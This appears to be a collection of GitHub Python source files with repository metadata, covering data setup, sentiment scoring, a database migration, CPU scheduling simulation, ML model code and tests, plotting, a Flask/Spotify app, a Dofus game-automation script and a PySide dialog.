{"seq_id":"30207865492","text":"import os\n\nimport numpy as np\n\nif not os.path.exists(\"data\"):\n    os.makedirs(\"data\")\n\nNUM_PEOPLE = 10\nNUM_CLUB = 2\n\n\ndef add_edge(A: np.ndarray, i: int | list[int], j: int | list[int]):\n    A[i, j] = 1\n    A[j, i] = 1\n\n\nA = np.zeros((NUM_PEOPLE, NUM_PEOPLE), dtype=np.int8)\nadd_edge(\n    A,\n    [0, 0, 3, 3, 5, 5, 6, 6, 7, 8],\n    [1, 3, 5, 6, 7, 9, 7, 9, 8, 9],\n)\nnp.save(\"data/A.npy\", A, allow_pickle=False)\n\n\nB = np.zeros((NUM_PEOPLE, NUM_CLUB), dtype=np.int8)\nB[[0, 1, 5], 0] = 1\nB[[1, 2, 3, 4], 1] = 1\nnp.save(\"data/B.npy\", B, allow_pickle=False)\n","repo_name":"TeddyHuang-00/Computational-Thinking-in-Social-Sciences","sub_path":"init_data.py","file_name":"init_data.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"22302165270","text":"import nltk\nfrom criterias_calculation.AFINN import emotion_tab\n\nclass Emotion:\n\n    def __init__(self, text):\n        self.text = text\n\n    def get_score(article):\n\n        # version AFINN\n        cpt_neg = 0\n        cpt_pos = 0\n        cpt_mots = 0\n        val_phrases = []\n\n        tokens = nltk.word_tokenize(article)\n        tagged_tokens = nltk.pos_tag(tokens)\n        for elem in tagged_tokens:\n            if elem[0] == '.':\n                val_phrases.append((cpt_neg / cpt_mots, cpt_pos / cpt_mots))\n                cpt_pos = 0\n                cpt_neg = 0\n            else:\n                cpt_mots += 1\n                if elem[0] in emotion_tab:\n                    if emotion_tab[elem[0]] < 0:\n                        cpt_neg += float(emotion_tab[elem[0]])\n                    else:\n                        cpt_pos += 
float(emotion_tab[elem[0]])\n\n cpt_neg = 0\n cpt_pos = 0\n for values in val_phrases:\n cpt_neg += values[0]\n cpt_pos += values[1]\n\n nb_phrases = len(val_phrases)\n cpt_neg = cpt_neg / nb_phrases\n cpt_pos = cpt_pos / nb_phrases\n\n score = abs(cpt_neg) + cpt_pos\n\n return score, (abs(cpt_neg)/score*100.), (cpt_pos/score*100.)\n","repo_name":"masterdcups/fake_news_detection_tool","sub_path":"criterias_calculation/emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"41514640228","text":"\"\"\"add session id to audio\n\nRevision ID: f31834b8c7a0\nRevises: 85f337478ffc\nCreate Date: 2023-03-16 16:02:53.552593\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f31834b8c7a0'\ndown_revision = '85f337478ffc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('audio_file', schema=None) as batch_op:\n batch_op.add_column(sa.Column('session_id', sa.Text(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('audio_file', schema=None) as batch_op:\n batch_op.drop_column('session_id')\n\n # ### end Alembic commands ###\n","repo_name":"adilnaut/fast-catchup","sub_path":"migrations/versions/f31834b8c7a0_add_session_id_to_audio.py","file_name":"f31834b8c7a0_add_session_id_to_audio.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36436963945","text":"from queue import Queue, PriorityQueue\r\n\r\n\r\ndef vrr(processL: list, eventq: PriorityQueue, quantum: int):\r\n clock = 0\r\n cpuIdle = True\r\n auxq = Queue()\r\n readyq = Queue()\r\n\r\n while True:\r\n if eventq.empty():\r\n return\r\n event = eventq.get()\r\n # print(event)\r\n\r\n if event[1] == 'ARRIVAL' or event[1] == 'UNBLOCK':\r\n if event[0] >= clock:\r\n clock = event[0]\r\n\r\n if event[1] == 'ARRIVAL':\r\n readyq.put(event[2])\r\n else:\r\n auxq.put(event[2])\r\n\r\n # subtracting cur time from resp. sum\r\n processL[event[2]][1][4] -= clock\r\n\r\n elif event[1] == 'TIMEOUT':\r\n if event[0] >= clock:\r\n clock = event[0]\r\n cpuIdle = True\r\n processL[event[2]][1][4] -= clock\r\n readyq.put(event[2])\r\n\r\n elif event[1] == 'BLOCK':\r\n if event[0] > clock:\r\n clock = event[0]\r\n stuff = processL[event[2]][0]\r\n time = int(stuff[stuff.find(\" \"):stuff.find(\" \", stuff.find(\" \") + 1)])\r\n\r\n # adding unblock event to queue\r\n eventq.put((clock + time, 'UNBLOCK', event[2]))\r\n\r\n cpuIdle = True\r\n\r\n # updating process stuff\r\n new_stuff = stuff[stuff.find(' ', 3) + 1:]\r\n processL[event[2]][0] = new_stuff\r\n\r\n elif event[1] == 'EXIT':\r\n if event[0] >= clock:\r\n clock = event[0]\r\n cpuIdle = True\r\n # finish time\r\n processL[event[2]][1][3] = clock\r\n\r\n if cpuIdle:\r\n if auxq.empty():\r\n if readyq.empty():\r\n continue\r\n pid = readyq.get()\r\n # print('dispatch rq ' + str(pid))\r\n else:\r\n pid = auxq.get()\r\n # print('dispatch aq ' + str(pid))\r\n\r\n # setting start time\r\n if processL[pid][2]:\r\n processL[pid][1][2] = clock\r\n processL[pid][2] = False\r\n # adding current clock to resp. 
sum\r\n processL[pid][1][4] += clock\r\n processL[pid][1][5] += 1\r\n\r\n cpuIdle = False\r\n stuff = processL[pid][0]\r\n bursttime = int(stuff[stuff.find(\" \"):stuff.find(\" \", stuff.find(\" \") + 1)])\r\n if bursttime > quantum:\r\n time = quantum\r\n else:\r\n time = bursttime\r\n\r\n # service time update\r\n processL[pid][1][1] += time\r\n\r\n # updating process stuff\r\n if bursttime <= quantum:\r\n new_stuff = stuff[stuff.find(' ', 4) + 1:]\r\n else:\r\n new_stuff = 'CPU ' + str(bursttime - quantum) + ' ' + stuff[stuff.find(' ', 4) + 1:]\r\n processL[pid][0] = new_stuff\r\n\r\n if new_stuff == '':\r\n eventq.put((clock + time, 'EXIT', pid))\r\n\r\n else:\r\n if bursttime <= quantum:\r\n # adding block event to aux queue\r\n eventq.put(((clock + time), 'BLOCK', pid))\r\n\r\n else:\r\n # adding timeout to ready queue\r\n eventq.put((clock + quantum, 'TIMEOUT', pid))\r\n","repo_name":"KTKChAoS/OS-scheduling-algorithms","sub_path":"vrr.py","file_name":"vrr.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42563638056","text":"import torch\nfrom graph_construction import graph_construction\n\ndef metric_M_diagonal(M_normalizer,feature,\\\n b_ind,\\\n label,\\\n n_feature,\\\n M_d_in,\\\n n_train,\\\n metric_M_step,Q_mask,optimizer_M,\\\n M_rec,\\\n low_rank_yes_no):\n \n if low_rank_yes_no==0:\n tril_idx=torch.tril_indices(n_feature,n_feature)\n Cholesky_U_0=torch.zeros(n_feature,n_feature)\n Cholesky_U_0[tril_idx[0,Q_mask],tril_idx[1,Q_mask]]=M_d_in\n M0=Cholesky_U_0@Cholesky_U_0.T\n else:\n M0=M_rec@M_rec.T\n \n factor_for_diag=torch.trace(M0)/M_normalizer\n M=M0/factor_for_diag\n \n\n \n # v = Variable(M_d_in.reshape(n_feature), requires_grad=True)\n # M_0=torch.diag(v)\n feature_train=feature[b_ind,:]\n L=graph_construction(feature_train, n_train, n_feature, M)\n metric_M_obj=torch.matmul(torch.matmul(label[b_ind].reshape(1,n_train),L),\\\n label[b_ind].reshape(n_train,1))\n \n metric_M_obj.backward()\n optimizer_M.step() \n # print(metric_M_obj)\n # projection\n # M_d=F.relu(M_d_in-metric_M_step*v.grad)\n # trace(M) <= n_feature\n # while M_d.sum()>n_feature:\n # try_num=(M_d.sum()-n_feature)/M_d.count_nonzero()\n # M_d=F.relu(M_d-try_num)\n # M_d_out=M_d.reshape(n_feature)\n # M_d_out=torch.multiply(M_d,n_feature/M_d.sum()).reshape(n_feature)\n # M=torch.diag(M_d)\n if low_rank_yes_no==0:\n Cholesky_U_0[tril_idx[0,Q_mask],tril_idx[1,Q_mask]]=M_d_in\n M0=Cholesky_U_0@Cholesky_U_0.T\n else:\n M0=M_rec@M_rec.T\n \n factor_for_diag=torch.trace(M0)/M_normalizer\n M=M0/factor_for_diag \n L_M=graph_construction(feature_train, n_train, n_feature, M)\n metric_M_obj_M=torch.matmul(torch.matmul(label[b_ind].reshape(1,n_train),L_M),\\\n label[b_ind].reshape(n_train,1))\n tol_current=torch.norm(metric_M_obj_M-metric_M_obj)\n return M_d_in,M,tol_current,M_rec","repo_name":"bobchengyang/SDP_RUN","sub_path":"metric_M_diagonal.py","file_name":"metric_M_diagonal.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30414301474","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom scipy.optimize import curve_fit\nimport debugpy\n\n\ndef calculate_msd(sample_data, unique_track_ids):\n max_norm_time = sample_data[\"normTime\"].max()\n msd = 
np.full((len(unique_track_ids), max_norm_time), np.nan)\n\n for ii in range(len(unique_track_ids)):\n track_data = sample_data[sample_data[\"TrackID\"] == unique_track_ids[ii]]\n norm_time = track_data[\"normTime\"].values\n msd_cell = track_data[\"MSD\"].values\n if len(msd[ii, :]) > len(msd_cell):\n msd[ii, :] = np.pad(\n msd_cell,\n (0, len(msd[ii, :]) - len(msd_cell)),\n \"constant\",\n constant_values=np.nan,\n )\n\n msd = np.nanmean(msd, axis=0) / (np.pi * 25)\n return msd[~np.isnan(msd)]\n\n\ndef plot_power_law_fits(msd, time_spacing):\n def power_law_model(x, A, B):\n return A * x**B\n\n start_ind = round(len(msd) / 4)\n fit_params, _ = curve_fit(\n power_law_model, np.arange(start_ind, len(msd)) * time_spacing, msd[start_ind:]\n )\n fit_A, fit_B = fit_params\n print(f\"Fit: A={fit_A:.2f}, B={fit_B:.2f}\")\n\n xref = np.logspace(0.2, 2.5, num=100)\n plt.plot(xref, 10**-2 * xref, \"k--\", linewidth=2)\n plt.plot(xref, 10**-2 * xref**2, \"r--\", linewidth=2)\n\n\ndef plot_3d_movie(T):\n times = T[\"Time\"].unique()\n # Calculate global axis ranges from the entire dataset\n x_range_global = [min(T[\"posx\"]), max(T[\"posx\"])]\n y_range_global = [min(T[\"posy\"]), max(T[\"posy\"])]\n z_range_global = [min(T[\"posz\"]), max(T[\"posz\"])]\n\n # Calculate aspect ratios based on global axis ranges\n x_range_length = x_range_global[1] - x_range_global[0]\n y_range_length = y_range_global[1] - y_range_global[0]\n z_range_length = z_range_global[1] - z_range_global[0]\n\n aspect_ratio_x = x_range_length / z_range_length\n aspect_ratio_y = y_range_length / z_range_length\n aspect_ratio_z = 1.0\n\n # Create a figure with a 3D scatter plot\n fig = go.Figure(\n data=[\n go.Scatter3d(\n x=[], y=[], z=[], mode=\"markers\", marker=dict(color=\"red\", size=1)\n )\n ]\n )\n # Define frames for the animation\n frames = []\n for t in times:\n filtered_data = T[T[\"Time\"] == t]\n scatter = go.Scatter3d(\n x=filtered_data[\"posx\"],\n y=filtered_data[\"posy\"],\n z=filtered_data[\"posz\"],\n mode=\"markers\",\n name=f\"Time {t}\",\n )\n frame = go.Frame(data=[scatter], name=f\"frame_{t}\")\n frames.append(frame)\n\n frame_layout = {\n \"scene\": {\n \"xaxis\": {\"range\": x_range_global},\n \"yaxis\": {\"range\": y_range_global},\n \"zaxis\": {\"range\": z_range_global},\n \"aspectmode\": \"manual\", # Set the desired aspect mode\n \"aspectratio\": {\n \"x\": aspect_ratio_x,\n \"y\": aspect_ratio_y,\n \"z\": aspect_ratio_z,\n },\n }\n }\n for frame in frames:\n frame.update(layout=frame_layout)\n\n debugpy.breakpoint()\n fig.frames = frames\n\n # Define animation settings\n animation_settings = go.layout.Updatemenu(\n type=\"buttons\",\n showactive=False,\n buttons=[\n {\n \"label\": \"Play\",\n \"method\": \"animate\",\n \"args\": [\n None,\n {\"frame\": {\"duration\": 100, \"redraw\": True}, \"fromcurrent\": True},\n ],\n },\n {\n \"label\": \"Pause\",\n \"method\": \"animate\",\n \"args\": [\n [None],\n {\n \"frame\": {\"duration\": 0, \"redraw\": True},\n \"mode\": \"immediate\",\n \"transition\": {\"duration\": 0},\n },\n ],\n },\n ],\n )\n # Set initial frame\n fig.update(frames=frames)\n\n # Set layout and animation settings\n fig.update_layout(\n title=\"Position Data Animation\",\n updatemenus=[animation_settings],\n scene=dict(\n xaxis_title=\"Position X\",\n yaxis_title=\"Position Y\",\n zaxis_title=\"Position Z\",\n ),\n )\n\n # Show the plot\n fig.show()\n\n\ndef main():\n # Read the CSV file\n filename = \"/Users/AndrewTon/Downloads/MSD_wt.csv\"\n time_spacing = 3 # minutes\n T = 
pd.read_csv(filename)\n\n # Set plot settings\n plt.rcParams[\"figure.figsize\"] = (10, 6)\n plt.rcParams[\"font.size\"] = 24\n\n # Loop over unique samples\n unique_samples = T[\"sample\"].unique()\n for sample_num in range(len(unique_samples)):\n # Filter data for the current sample\n sample_data = T[T[\"sample\"] == unique_samples[sample_num]]\n unique_track_ids = sample_data[\"TrackID\"].unique()\n plot_3d_movie(sample_data)\n print(\"leaving sample loop\")\n\n # msd = calculate_msd(sample_data, unique_track_ids)\n # plt.plot(np.arange(len(msd)) * time_spacing, msd, linewidth=2)\n # plt.xlabel(\"Time (min)\")\n # plt.ylabel(\"MSD/a0\")\n\n # plot_power_law_fits(msd, time_spacing)\n # plt.xscale(\"log\")\n # plt.yscale(\"log\")\n\n debugpy.breakpoint()\n print(\"closing program\")\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tandrewton/psm_extracellular_calculation","sub_path":"postprocessImarisCSV.py","file_name":"postprocessImarisCSV.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28470962084","text":"def divisor(n):\n count = 1\n for i in range(1, n // 2 + 1):\n if n % i == 0:\n count += 1\n return count\n\n\ndef solution(left, right):\n return sum([item if divisor(item) % 2 == 0 else -item for item in range(left, right + 1)])\n\n\n# Test Cases\nprint(solution(13, 17))\nprint(solution(24, 27))\n\n\n\"\"\"\ndef solution(left, right):\n answer = 0\n for i in range(left,right+1):\n if int(i**0.5)==i**0.5:\n answer -= i\n else:\n answer += i\n return answer\n \n \n이런 방법이?\n\"\"\"\n","repo_name":"909ma/Repository-for-Study","sub_path":"프로그래머스/Python_약수의 개수와 덧셈.py","file_name":"Python_약수의 개수와 덧셈.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70811450488","text":"import numpy as np\nimport pyautogui\nimport time\n\nprint(pyautogui.size())\n\nscreenshot = pyautogui.screenshot()\nscreenshot = np.array(screenshot)\n\nL, H = pyautogui.size()[0], pyautogui.size()[1]\n\npixelTargetList = [[255, 160, 4], [178, 178, 185], [182, 19, 19], [252, 33, 25], [252, 30, 26], [68, 66, 54],\n [214, 202, 1]]\n\nTurn = 0\nStart = True\n\ntime.sleep(1)\n\nwhile True:\n\n screenshot = pyautogui.screenshot()\n screenshot = np.array(screenshot).tolist()\n\n # Nature\n if screenshot[990][1350] == [163, 205, 50]:\n # Fin combat\n if Turn > 0:\n print(\"Fin combat\")\n pyautogui.press(\"esc\")\n\n Turn = 0\n Start = True\n\n for i in range(H):\n flag = False\n for j in range(L):\n if screenshot[i][j] in pixelTargetList:\n pyautogui.moveTo(j, i, 0.5)\n pyautogui.leftClick()\n\n screenshot = pyautogui.screenshot()\n screenshot = np.array(screenshot).tolist()\n\n if screenshot[1000][1353] == [66, 213, 215]:\n flag = True\n break\n if flag == True:\n break\n\n # Combat\n else:\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n if (Start):\n pyautogui.moveTo(1450, 1000, 0.5)\n pyautogui.leftClick()\n Start = False\n pyautogui.moveTo(10, 10, 0.5)\n\n if Turn == 0:\n\n if screenshotFight[1000][1353] == [66, 213, 215]:\n\n # Altéré N°1\n if screenshotFight[1020][981] == [109, 91, 118]:\n time.sleep(0.5)\n pyautogui.hotkey(\"ctrl\", \"'\")\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n for i in range(H):\n flag1 = False\n for j in range(L):\n if screenshotFight[i][j] == [34, 51, 
153]:\n pyautogui.moveTo(j, i, 0.5)\n time.sleep(0.5)\n pyautogui.leftClick()\n\n flag1 = True\n break\n if flag1 == True:\n break\n\n # Altéré N°2\n if screenshotFight[1020][1072] == [109, 91, 118]:\n time.sleep(0.5)\n pyautogui.hotkey(\"ctrl\", \"-\")\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n for i in range(H):\n flag2 = False\n for j in range(L):\n if screenshotFight[i][j] == [34, 51, 153]:\n pyautogui.moveTo(j, i, 0.5)\n time.sleep(0.5)\n pyautogui.leftClick()\n\n flag2 = True\n break\n if flag2 == True:\n break\n\n # Liberté des altérés\n if screenshotFight[1000][1000] == [162, 134, 82]:\n time.sleep(0.5)\n pyautogui.press(\"'\")\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n for i in range(H):\n flag3 = False\n for j in range(L):\n if screenshotFight[i][j] == [34, 51, 153]:\n pyautogui.moveTo(j, i, 0.5)\n time.sleep(0.5)\n pyautogui.leftClick()\n\n flag3 = True\n pyautogui.moveTo(10, 10, 0.5)\n break\n if flag3 == True:\n break\n Turn += 1\n else:\n time.sleep(0.5)\n pyautogui.press(\"f1\")\n","repo_name":"Derni300/DofusFARM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32666326386","text":"import os\nimport string\nimport random\nfrom typing import Tuple, Dict\nfrom pprint import pprint\nfrom conf import SECRET_KEY, CLIENT_ID, CLIENT_KEY, REDIRECT_URI\n# from server.models import Room\n\n\nfrom flask import Flask\nfrom flask_socketio import SocketIO\nfrom server.services import TickTimer\nimport spotify.sync as spotify\n\n\n# SPOTIFY_CLIENT = spotify.Client(CLIENT_ID, CLIENT_KEY)\n\n# APP = flask.Flask(__name__)\n\n# APP.config.from_mapping({'spotify_client': SPOTIFY_CLIENT})\n# APP.config['SECRET_KEY'] = SECRET_KEY\n\n# OAUTH2_SCOPES: Tuple[str] = ('user-modify-playback-state', 'user-read-currently-playing', 'user-read-playback-state')\n# OAUTH2: spotify.OAuth2 = spotify.OAuth2(SPOTIFY_CLIENT.id, REDIRECT_URI, scopes=OAUTH2_SCOPES)\n\n# APP.config['OAUTH2'] = OAUTH2\n\n# SPOTIFY_USERS: Dict[str, spotify.User] = {}\n\n\n\nclass Player(Flask):\n @staticmethod\n def create_app():\n \"\"\"\n Application factory\n \"\"\"\n\n app = Player(__name__)\n socketio = SocketIO(app)\n\n return app, socketio\n\n def setupSpotify(self):\n self.SPOTIFY_CLIENT = spotify.Client(CLIENT_ID, CLIENT_KEY)\n\n app.config.from_mapping({'spotify_client': self.SPOTIFY_CLIENT})\n app.config['SECRET_KEY'] = SECRET_KEY\n\n OAUTH2_SCOPES: Tuple[str] = ('user-modify-playback-state', 'user-read-currently-playing', 'user-read-playback-state', 'playlist-modify-public', 'playlist-modify-private')\n self.OAUTH2: spotify.OAuth2 = spotify.OAuth2(self.SPOTIFY_CLIENT.id, REDIRECT_URI, scopes=OAUTH2_SCOPES)\n\n app.config['OAUTH2'] = self.OAUTH2\n pprint(self.OAUTH2)\n\n self.SPOTIFY_USERS: Dict[str, spotify.User] = {}\n self.rooms = {}\n self.userToRoom: Dict[str, str] = {}\n\n def registerBlueprints(self):\n from server.blueprints import webPrint, spotifyPrint\n self.register_blueprint(webPrint)\n self.register_blueprint(spotifyPrint)\n\n def registerHelpers(self):\n from server.jinjaHelpers import timeToHuman\n self.add_template_filter(timeToHuman)\n\n def setup(self):\n self.setupSpotify()\n self.registerHelpers()\n self.registerBlueprints()\n\n def start(self, ip='127.0.0.1', port=8888, debug=True, doSetup=True):\n if doSetup:\n self.setup()\n self.timer 
= TickTimer()\n socketio.run(self, ip, port=port, debug=debug)\n self.timer.stop()\n\n\napp, socketio = Player.create_app()\n\n__all__ = [\n 'app',\n 'socketio',\n]","repo_name":"Spotify-party-player/server","sub_path":"server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24452984405","text":"''' Macro module for summoner related macros '''\nimport asyncio\nimport time\n\nfrom client.account import get_username\nfrom client.exceptions import AccountChangeNeededException, LogoutNeededException\n\nfrom utils import naturaldelta\n\n\nasync def check_username_macro(logger, connection, username):\n ''' Checks if the current logged in account is correct '''\n checkpoint_time = time.time()\n logger.log('Getting username...')\n for _ in range(20):\n username_client = await get_username(connection)\n if username_client is None or username_client == '':\n await asyncio.sleep(1)\n continue\n\n if username.lower() != username_client.lower():\n logger.log(\n f'Expected username: {username.lower()}. '\n 'Current username: {username_client.lower()}')\n raise AccountChangeNeededException\n break\n else:\n raise LogoutNeededException\n logger.log('Got username, took {}'.format(naturaldelta(time.time() - checkpoint_time)))\n","repo_name":"pradishb/auto-disenchanter","sub_path":"macro/summoner.py","file_name":"summoner.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"26535794873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 8 17:21:03 2020\n\n@author: User\n\"\"\"\n\n\nimport tensorflow as tf\nfrom model import SimpleModel\nfrom utils import iterator_utils\nfrom utils.misc_utils import HParams, Files\nfrom os.path import join\nimport numpy as np\n\n\nTRAIN_FILES = Files(src_vcb_file = join('test_data', 'vcbs', 'src_vcb.txt'),\n trg_vcb_file = join('test_data', 'vcbs', 'trg_vcb.txt'),\n src_train = join('test_data', 'train', 'src.txt'),\n trg_train = join('test_data', 'train', 'trg.txt'),\n src_dev = join('test_data', 'dev', 'src.txt'),\n trg_dev = join('test_data', 'dev', 'trg.txt'),\n src_test = join('test_data', 'test', 'src.txt'),\n trg_test = join('test_data', 'test', 'trg.txt'))\n\nTRAIN_HPARAMS = HParams('TRAIN',\n filesobj = TRAIN_FILES,\n buffer_size = None,\n num_epochs = 1,\n batch_size = 2,\n model_type = 'simple_model',\n logdir = './logs/train_logs',\n src_embeddings_matrix_file = join('test_data', 'pretrained_embeddings',\n 'src_matrix.p'),\n trg_embeddings_matrix_file = join('test_data', 'pretrained_embeddings',\n 'trg_matrix.p'),\n num_units = 32,\n learning_rate = 3e-04,\n translation_file_path = None,\n num_steps_to_eval = None, \n chkpts_dir = './chkpts'\n )\n\n\n\nclass ModelTest(tf.test.TestCase):\n \n def setUp(self):\n \n super(ModelTest, self).setUp()\n \n self.graph = tf.Graph()\n \n self.sess = tf.Session(graph = self.graph)\n \n with self.graph.as_default():\n \n self.iterator, _ = iterator_utils.get_iterator('TRAIN',\n filesobj = TRAIN_FILES,\n buffer_size = TRAIN_HPARAMS.buffer_size,\n num_epochs = TRAIN_HPARAMS.num_epochs,\n batch_size = TRAIN_HPARAMS.batch_size,\n debug_mode = True)\n \n self.model = SimpleModel(TRAIN_HPARAMS, \n self.iterator, \n 'TRAIN')\n \n self.table_init_op = tf.tables_initializer()\n \n self.vars_init_op = tf.global_variables_initializer()\n \n \n def testGraphVariables(self):\n \n 
expected_variables = {'decoder/decoder_outter_scope/dense/kernel:0': (2 * self.model._num_units,\n 13),\n \n 'encoder/bidirectional_rnn/fw/lstm_cell/kernel:0': (3 + self.model._num_units,\n 4 * self.model._num_units),\n \n 'encoder/bidirectional_rnn/fw/lstm_cell/bias:0': (4 * self.model._num_units, ),\n \n 'encoder/bidirectional_rnn/bw/lstm_cell/kernel:0': (3 + self.model._num_units,\n 4 * self.model._num_units),\n \n 'encoder/bidirectional_rnn/bw/lstm_cell/bias:0': (4 * self.model._num_units, ),\n \n 'decoder/decoder_outter_scope/basic_lstm_cell/kernel:0': (3 + 2 * self.model._num_units,\n 4 * 2 * self.model._num_units),\n \n 'decoder/decoder_outter_scope/basic_lstm_cell/bias:0': (4 * 2 * self.model._num_units, )\n }\n \n with self.graph.as_default():\n \n var_names = [var.name for var in tf.trainable_variables()]\n \n self.assertAllEqual(sorted(var_names), sorted(list(expected_variables.keys())),\n 'variables are not compatible')\n \n with self.graph.as_default():\n \n for var in tf.trainable_variables():\n \n self.assertAllEqual(tuple(var.get_shape().as_list()),\n expected_variables[var.name],\n 'missed shapes at {}'.format(var.name))\n \n \n \n def testEmbeddingsMatrixCorrectness(self):\n \n self.sess.run(self.vars_init_op)\n \n \n src_matrix = self.model.source_embeddings_matrix.eval(session = self.sess)\n \n trg_matrix = self.model.target_embeddings_matrix.eval(session = self.sess)\n \n \n expected_src = np.ones(shape = (12, 3))\n \n expected_trg = np.ones(shape = (13, 3))\n \n \n self.assertAllEqual(expected_src, src_matrix, \n 'src matrix is wrong')\n \n self.assertAllEqual(expected_trg, trg_matrix, \n 'trg matrix is wrong')\n \n \n \n def testLossMaskFunction(self):\n \n res1 = np.array([[1, 1, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1]])\n \n res2 = np.array([[1, 1],\n [1, 1],\n [1, 1],\n [1, 1],\n [1, 1]])\n \n res3 = np.array([[1, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])\n \n \n with self.graph.as_default():\n \n with tf.name_scope('first_try'):\n \n try1 = self.model._return_loss_mask(tf.constant((2, 3, 7)),\n tf.constant(7))\n \n with tf.name_scope('second_try'):\n \n try2 = self.model._return_loss_mask(tf.constant((2, 2, 2, 2, 2)),\n tf.constant(2))\n \n with tf.name_scope('third_try'):\n \n try3 = self.model._return_loss_mask(tf.constant((3, 2, 1, 4, 6, 4, 3, 10)),\n tf.constant(10))\n \n exp1 = self.sess.run(try1)\n \n exp2 = self.sess.run(try2)\n \n exp3 = self.sess.run(try3)\n \n \n self.assertAllEqual(res1, exp1,\n 'first case is down')\n \n self.assertAllEqual(res2, exp2,\n 'second case is down')\n \n self.assertAllEqual(res3, exp3,\n 'third case is down')\n \n \n def testModelInitialLoss(self):\n \n loss_tensor = self.graph.get_tensor_by_name('loss/add:0')\n \n self.sess.run(self.table_init_op)\n \n self.sess.run(self.iterator.initializer)\n \n self.sess.run(self.vars_init_op)\n \n real_loss = self.sess.run(loss_tensor)\n \n ### Based on suggestion that on the very first step model \n ### does not know anything hence it should output equal\n ### probabilities for all the words in the target vcb\n \n expected_loss = -6 * np.log(1 / 13) #15.389696144769221\n \n self.assertAllClose(real_loss, expected_loss, \n atol = 0.3,\n msg = '{} vs {}'.format(real_loss, expected_loss))\n \n \nif __name__ == '__main__':\n \n 
tf.test.main()\n \n \n \n ","repo_name":"meduzick/cs224n_winter2019","sub_path":"a4/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":8590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4118806235","text":"import sys\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\n\nclass Logger:\n\n def __init__(self, \n log_file, \n log_format=\"[%(asctime)s][%(name)s][%(levelname)s] %(message)s\"):\n\n self.log_file = log_file\n self.formatter = logging.Formatter(log_format)\n \n def get(self, logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(self.__get_file_handler__())\n logger.addHandler(self.__get_console_handler__())\n logger.propagate = False\n return logger\n\n def __get_console_handler__(self):\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(self.formatter)\n return console_handler\n\n def __get_file_handler__(self):\n file_handler = TimedRotatingFileHandler(self.log_file, when='midnight')\n file_handler.setFormatter(self.formatter)\n return file_handler\n\n\ndef get(logger_name, log_file='etl.log'):\n return Logger(log_file=log_file).get(logger_name)","repo_name":"alimghmi/crypto-news-etl","sub_path":"logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14557725256","text":"import sqlite3\n\nfrom PySide6.QtWidgets import QDialog, QGroupBox, QPushButton, QHBoxLayout, QWidget, QVBoxLayout, QCheckBox\n\n\nclass DelColDialog(QDialog):\n def __init__(self, table_name):\n super().__init__()\n self.__initVal()\n self.__initUi(table_name)\n\n def __initVal(self):\n self.__chkBoxes = []\n\n def __initUi(self, table_name):\n lay = QVBoxLayout()\n\n conn = sqlite3.connect('contacts.sqlite')\n cur = conn.cursor()\n\n mysel = cur.execute(f\"select * from {table_name}\")\n columnNames = 